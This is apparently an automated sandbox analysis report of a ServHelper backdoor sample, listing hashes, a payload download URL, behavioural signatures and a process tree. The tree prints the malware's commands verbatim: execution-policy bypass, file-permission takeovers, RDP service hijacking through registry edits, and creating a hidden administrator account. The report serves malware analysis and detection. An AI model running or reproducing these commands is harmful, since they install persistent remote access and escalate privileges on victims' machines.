Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
31-01-2022 23:41
Static task
static1
Behavioral task
behavioral1
Sample
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe
Resource
win10v2004-en-20220112
General
-
Target
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe
-
Size
4.5MB
-
MD5
d9825d1424b9058fd87f5bb6e808346a
-
SHA1
21980e67e2bba65b9753021e9091c2ab7c99f3e3
-
SHA256
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3
-
SHA512
7359f0bc4f06f48b8a60764ba142bf7650cee52cfa8499142686c846abc8366faf6f8746573ec370eef64e6c92b5999e8e22f9521c4da91626d7d783883a0cef
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 49 1464 powershell.exe 51 1464 powershell.exe 52 1464 powershell.exe 53 1464 powershell.exe 54 1464 powershell.exe 56 1464 powershell.exe 58 1464 powershell.exe 60 1464 powershell.exe 62 1464 powershell.exe 64 1464 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1408 takeown.exe 1884 icacls.exe 3780 icacls.exe 3540 icacls.exe 3360 icacls.exe 3428 icacls.exe 3904 icacls.exe 3700 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Windows\Branding\mediasrv.png upx C:\Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1836 1836 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 3700 icacls.exe 1408 takeown.exe 1884 icacls.exe 3780 icacls.exe 3540 icacls.exe 3360 icacls.exe 3428 icacls.exe 3904 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 18 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_p0o2z5a2.m2v.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6307.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_3osflhao.wue.ps1 powershell.exe File created C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI61BB.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6287.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6298.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI62F7.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWaaSMedicAgent.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 81091ab10308d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 51 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 HTTP User-Agent header 53 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 54 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 HTTP User-Agent header 56 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2460 powershell.exe 2460 powershell.exe 1528 powershell.exe 1528 powershell.exe 2872 powershell.exe 2872 powershell.exe 3740 powershell.exe 3740 powershell.exe 2460 powershell.exe 2460 powershell.exe 2460 powershell.exe 1464 powershell.exe 1464 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 668 668 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeRestorePrivilege 3780 icacls.exe Token: SeAssignPrimaryTokenPrivilege 3640 WMIC.exe Token: SeIncreaseQuotaPrivilege 3640 WMIC.exe Token: SeAuditPrivilege 3640 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3640 WMIC.exe Token: SeIncreaseQuotaPrivilege 3640 WMIC.exe Token: SeAuditPrivilege 3640 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3740 WMIC.exe Token: SeIncreaseQuotaPrivilege 3740 WMIC.exe Token: SeAuditPrivilege 3740 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3740 WMIC.exe Token: SeIncreaseQuotaPrivilege 3740 WMIC.exe Token: SeAuditPrivilege 3740 WMIC.exe Token: SeDebugPrivilege 1464 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3876 wrote to memory of 2460 3876 a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe powershell.exe PID 3876 wrote to memory of 2460 3876 a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe powershell.exe PID 2460 wrote to memory of 3108 2460 powershell.exe csc.exe PID 2460 wrote to memory of 3108 2460 powershell.exe csc.exe PID 3108 wrote to memory of 2620 3108 csc.exe cvtres.exe PID 3108 wrote to memory of 2620 3108 csc.exe cvtres.exe PID 2460 wrote to memory of 1528 2460 powershell.exe powershell.exe PID 2460 wrote to memory of 1528 2460 powershell.exe powershell.exe PID 2460 wrote to memory of 2872 2460 powershell.exe powershell.exe PID 2460 wrote to memory of 2872 2460 powershell.exe powershell.exe PID 2460 wrote to memory of 3740 2460 powershell.exe powershell.exe PID 2460 wrote to memory of 3740 2460 powershell.exe powershell.exe PID 2460 wrote to memory of 1408 2460 powershell.exe takeown.exe PID 2460 wrote to memory of 1408 2460 powershell.exe takeown.exe PID 2460 wrote to memory of 1884 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 1884 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3780 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3780 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3540 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3540 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3360 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3360 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3428 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3428 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3904 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3904 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3700 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 3700 2460 powershell.exe icacls.exe PID 2460 wrote to memory of 452 2460 powershell.exe reg.exe PID 2460 wrote to memory of 452 2460 powershell.exe reg.exe PID 2460 wrote to memory of 3584 2460 powershell.exe reg.exe PID 2460 wrote to memory of 3584 2460 powershell.exe reg.exe PID 2460 wrote to memory of 1360 2460 powershell.exe reg.exe PID 2460 wrote to memory of 1360 2460 powershell.exe reg.exe PID 2460 wrote to memory of 1288 2460 powershell.exe net.exe PID 2460 wrote to memory of 1288 2460 powershell.exe net.exe PID 1288 wrote to memory of 2744 1288 net.exe net1.exe PID 1288 wrote to memory of 2744 1288 net.exe net1.exe PID 2460 wrote to memory of 1420 2460 powershell.exe cmd.exe PID 2460 wrote to memory of 1420 2460 powershell.exe cmd.exe PID 1420 wrote to memory of 64 1420 cmd.exe cmd.exe PID 1420 wrote to memory of 64 1420 cmd.exe cmd.exe PID 64 wrote to memory of 1848 64 cmd.exe net.exe PID 64 wrote to memory of 1848 64 cmd.exe net.exe PID 1848 wrote to memory of 1748 1848 net.exe net1.exe PID 1848 wrote to memory of 1748 1848 net.exe net1.exe PID 2460 wrote to memory of 2784 2460 powershell.exe cmd.exe PID 2460 wrote to memory of 2784 2460 powershell.exe cmd.exe PID 2784 wrote to memory of 3824 2784 cmd.exe cmd.exe PID 2784 wrote to memory of 3824 2784 cmd.exe cmd.exe PID 3824 wrote to memory of 3676 3824 cmd.exe net.exe PID 3824 wrote to memory of 3676 3824 cmd.exe net.exe PID 3676 wrote to memory of 2752 3676 net.exe net1.exe PID 3676 wrote to memory of 2752 3676 net.exe net1.exe PID 2420 wrote to memory of 4008 2420 cmd.exe net.exe PID 2420 wrote to memory of 4008 2420 cmd.exe net.exe PID 4008 wrote to memory of 4060 4008 net.exe net1.exe PID 4008 wrote to memory of 4060 4008 net.exe net1.exe PID 3712 wrote to memory of 1772 3712 cmd.exe net.exe PID 3712 wrote to memory of 1772 3712 cmd.exe net.exe PID 1772 wrote to memory of 1408 1772 net.exe net1.exe PID 1772 wrote to memory of 1408 1772 net.exe net1.exe PID 3980 wrote to memory of 3852 3980 cmd.exe net.exe PID 3980 wrote to memory of 3852 3980 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe"C:\Users\Admin\AppData\Local\Temp\a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j5bwqhne\j5bwqhne.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0E7.tmp" "c:\Users\Admin\AppData\Local\Temp\j5bwqhne\CSCDDA7E95467DE4E0E95C9B57681387A73.TMP"4⤵PID:2620
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1408
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1884
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3540
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3360
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3428
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3904
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3700
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:452
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3584
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1360
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2744
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1748
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2752
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵PID:3364
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe ced56fdb4f6d69c3f8c1587287054166 lQrIatP0sESqbu2kA5qkfA.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:3372
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:4060
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc bSDBzf1f /add1⤵
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc bSDBzf1f /add2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc bSDBzf1f /add3⤵PID:1408
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:3852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3444
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD1⤵PID:1924
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD2⤵PID:2008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD3⤵PID:3060
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:3276
-
